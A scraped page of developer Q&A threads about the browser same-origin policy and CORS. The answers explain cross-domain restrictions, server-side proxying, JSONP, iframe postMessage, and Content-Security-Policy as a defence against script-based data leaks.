Using a client's IP to get content - javascript

I'm a bit embarrassed here because I am trying to get content remotely, by using the client's browser and not the server. But I have specifications which make it look impossible to me, I literally spent all day on it with no success.
The data I need to fetch is on a distant server.
I don't own this server (I can't do any modification to it).
It's a string, and I need to get it and pass it to PHP.
It must be the client's (user browsing the website) browser that actually gets the data (it needs to be it's IP, and not the servers).
And, with the cross-domain policy I don't seem to be able to get around it. I already knew about it, still tried a simple Ajax query, which failed. Then I though 'why not use iFrames', but the same limitation seems to apply to them too. I then read about using YQL (http://developer.yahoo.com/yql/) but I noticed the server I was trying to reach blocked YQL's user-agent making it impossible to use this technique.
So, that's all I could think about or find. But I can't believe it's not possible to achieve such a thing, that doesn't even look hard...
Oh, and my Javascript knowledge is very basic, this mustn't help either.

This is one reason that the same-origin policy exists. You're trying to have your webpage access data on a different server, without the user knowing, and without having "permission" from the other server to do so.
Without establishing a two-way trust system (ie modifying the 'other' server), I believe this is not possible.
Even with new xhr and crossdomain support, two-way trust is still required for the communication to work.
You could consider a fat-client approach, or try #selbie suggestion and require manual user interaction.

The same origin policy prevents document or script loaded from one
origin from getting or setting properties of a document from a different
origin.
-- From http://www.mozilla.org/projects/security/components/same-origin.html
Now if you wish to do some hackery to get it... visit this site
Note: I have never tried any of the methods on the aforementioned site and cannot guarantee their success

I can only see a really ugly solution: iFrames. This article contains some good informations to start with.

You could do it with flash application:
flash with a crossdomain.xml file (won't help though since you don't control the other server)
On new browsers there is CORS - requires Access-Control-Allow-Origin header set on the server side.
You can also try to use JSONP (but I think that won't work since you don't own the other server).
I think you need to bite the bullet and find some other way to get the content (on the server side for example).

Related

Relax Same Origin Rule for Javascript Widget (deprecated google finance backfill data)

Background:
I have a small javascript-powered widget that uses data from another origin. I tested it successfully in my local IDE using external (non-origin) data from:
https://www.google.com/finance/getprices?q=.NSEI&x=NSE&i=600&p=1d&f=d,o,h,l,c,v
When I uploaded this widget to my wordpress site I got the error:
SEC7120: Origin http://www.my-wordpress-site.com not found in
Access-Control-Allow-Origin header.
Which in turn made my calls to the data return something like this:
SCRIPT5007: SCRIPT5007: Unable to get property 'split' of undefined or
null reference
Disclaimer:
I know that google finance has long since been deprecated, but my understanding is that the servers were left running. This means that the data is still there. Google clearly states that using the data for consumption violates the terms of usage for this data. What I am building is not an API, or anything consumption related. It's merely a front-end widget serving strictly as aesthetic ornamentation. I just want it to make the site look cooler by plotting some finance data.
Nonetheless, I'm not sure if google is not allowing me to fetch the data because it doesn't recognize my website. Maybe I have misunderstood the terms of use, but I don't think I have, but who knows. I'm hoping its a small protocol type of fix where I add a few lines and everything is happily ever after. Alternatively, if it is indeed the other way around, I don't have any control over what domains google trusts and I don't imagine contacting google and saying "hey google, don't leave my website out in the cold" would work.
Question: How do I relax the same origin rule? A few similar questions have been asked on stack overflow for c#, but I still wonder how to do this for my wordpress javascript widget. Can javascript alone do it?
I see a lot of examples having:
header("Access-Control-Allow-Origin: http://mozilla.com");
I don't know what language that is. I'm guessing PHP or c#. I don't know anything about those languages. I just want to design my widgets without having to learn a billion things about back-end protocols. I'm prepared to put in some effort though.
Clarification
I have made widgets this way (pointing an iframe to my widget's html located on my cpanel server where wordpress is in wp-content/uploads/2018/03) before and had no trouble at all. This time around I'm getting the origin errors as noted above in my post. The only difference is now I'm using some external data from a google server. Maybe it's google that doesn't recognize my site? The widget worked perfectly offline in my IDE. I'm not sure how to proceed and whether or not word-press has anything to bring to bear for these things to help widget designers like myself out, or if it's another matter altogether.
Error result confirmed in the following browsers:
edge
chrome
The issue is fairly straightforward. Browsers enforce the Same Origin Policy, which prevents sites from accessing data fetched from a foreign domain. CORS is a protocol that servers can use to instruct browsers to allow foreign domains to read their data.
Public APIs that are intended to be used in a browser context will generally use CORS to make this possible. For whatever reason, Google does not seem to be using CORS to allow public access to this API. In particular, their response does not include the appropriate Access-Control-Allow-Origin header (part of the CORS protocol) to allow Javascript from your site to read the data. There is really nothing you can do about that.
The standard workaround is to proxy the data. That is, instead of having your code use the API directly, it would instead hit a URL on your server, which would then fetch the requested data from Google and return it. The server will be able to read the data because the Same Origin Policy (being a browser concern) won't apply. And your Javascript will be able to read the result since the request was made to the same domain.
If there are ways to get around the Same Origin Policy in the browser, I'm not familiar with them.

Lightest single page scraper

There is some website that publishes some everchanging data. There is no api but I need to access that value programmatically in js. This is a common problem for me.
I am writing a simple js script(HTML/js) hackyAPI, HTML/js or client side is enough for any manipulations I want to do on the data.
But the problem is XMLHttpRequest and cross server permissions. I do not want to introduce server elements just for this. Is there is a workaround considering I just want a typical html respone ?
CORS restrictions are enforced by browsers explicitly to prevent this kind of script (as well as more malicious XSS scripts); whoever is running that site is providing those resources (and paying to serve them up), so unless they're offering a public API it's not really fair to use that data in the way you seem to be trying to do. In this particular case it seems to be directly in conflict with the site's terms of service.

BasicAuth enabled CORS requests on IE8/9

So, this happened. Quick bullet point list of facts:
I have a HAL backend that lives on a different subdomain but (thankfully for IE10 support) in the same domain as my web app.
I need POST and GET requests made.
I do not need support for IE7 or less.
I NEED support for IE8 and up.
The way the API is built, I need to both send custom headers and be able to access the response headers. One of them is the basicAuth headers, but there may be more (like Location response headers and whatnot).
I am well aware of the limitations of the XDomainRequest object.
I have full control of both the API and the web app servers, code and everything in between. Yet, we believe the API is well built and shouldn't change because of one browser's poor implementation, so we'd like to keep changes to it at a minimum.
So that's how things are going. So far, I've checked a few alternatives that do not work. Here's a list of them and why it wouldn't help in this case:
- JSONP, it only allows GET requests.
- easyXDM, it does not allow custom headers to be sent.
- OpenAjax Hub, documentation seemed confusing and scarce, but it seems that it has no support for custom headers either.
So here's the question: is there any solution I am missing? My only hope right now is to build a custom swf and override jQuery's $.ajax function to be able to use it as a transport, but am unsure if it'll work. In theory, it should. In practice... well, that's another matter entirely. SO before delving in the depths of swf hell, I thought I might ask if anyone ever faced this problem before and have any form of advice?
You're missing an embedded iframe, whose src lives on the other domain, and using window.postMessage to go back and forth between the two windows, where the embedded iframe does all of the XHR for your subdomain, and then sends back a custom-wrapped response with all of the header/data you would typically see in CORS.
You'll then have your IE8/9 support.

Have someone modify javascript code without write access

I would like to test out some interviewees by having them write some javascript that will make requests against my server. I don't want to give them write access to my code base. Javascript runs on the client side, so this should technically be possible. However I know there are browser restrictions that say that the javascript has to come from the server?
I apologize that this is a really dumb question, but how should I proceed?
Edit:::
Ok, so I failed to mention that the entire application is based off sending JSON objects to and from the server.
I think you're thinking of the javascript XMLHttpRequest object itself, in which case, yes the current standard is for browsers to block cross-domain calls. So, you can tell them to pretend they either have a separate proxy script on their own personal domain which will allow them to leap to yours, or to pretend they're building a page directly served from your domain. There's talk of browsers supporting trust certificates or honoring special setups between source and target servers, but nothing universally accepted AFAIK.
Javascript source itself does not need to come from the server, and in fact this is how you can get around this little XMLHttpRequest block by using json. Here's a simple json tutorial I just dug up from Yahoo. But, this calls for your server to provide a json format feed if your server is the intended target.
"there are browser restrictions that say that the javascript has to come from the server"
I'm not aware of any situation where that's the case, only a lack of a console. But...even in those cases there's the address bar and javascript:.
If I misunderstood and you're talking about cross-domain restrictions, then your server needs to support JSONP for the requests so they can make cross-domain calls for data.
You could POST the javascript to your server and then your server can send back some HTML that has the javascript inlined. Sounds like you're trying to set up something is, more or less, a homebrew version of http://jsfiddle.net/; AFAIK, jsfiddle just does a "POST javascript/CSS/HTML and return HTML".

Cross-Origin Resource Sharing (CORS) - am I missing something here?

I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with list of acceptable CORS servers (abc.com, xyz.com, etc)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making a stricter cross domain policy on other tags (script/image) while being more secure, would break a lot of existing code, and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure its an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
The problem isn't that a site can access another sites resources that it already had access to. The problem is one of domain -- If I'm using a browser at my company, and an ajax script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution -- CORS. I'm not saying its the best, but is solves this issue.
1) If the gateway can't return back the 'bobthehacker.com' accepted origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the SIMPLE CORS case, it will actually still return the results. By default; you can configure the server to not even do that. Then the results are discarded without being loaded by the browser.
3) Finally, even if it would accept certain domains, you have some control over the headers that are accepted and rejected to make the request from those sites conform to a certain shape.
Note -- the ORIGIN and OPTIONS headers are controlled by the requester -- obviously someone creating their own HTTP request can put whatever they want in there. However a modern CORS compliant browser WONT do that. It is the Browser that controls the interaction. The browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
I share David's concerns.
Security must be built layer by layer and a white list served by the origin server seems to be a good approach.
Plus, this white list can be used to close existing loopholes (forms, script tag, etc...), it's safe to assume that a server serving the white list is designed to avoid back compatibility issues.

Categories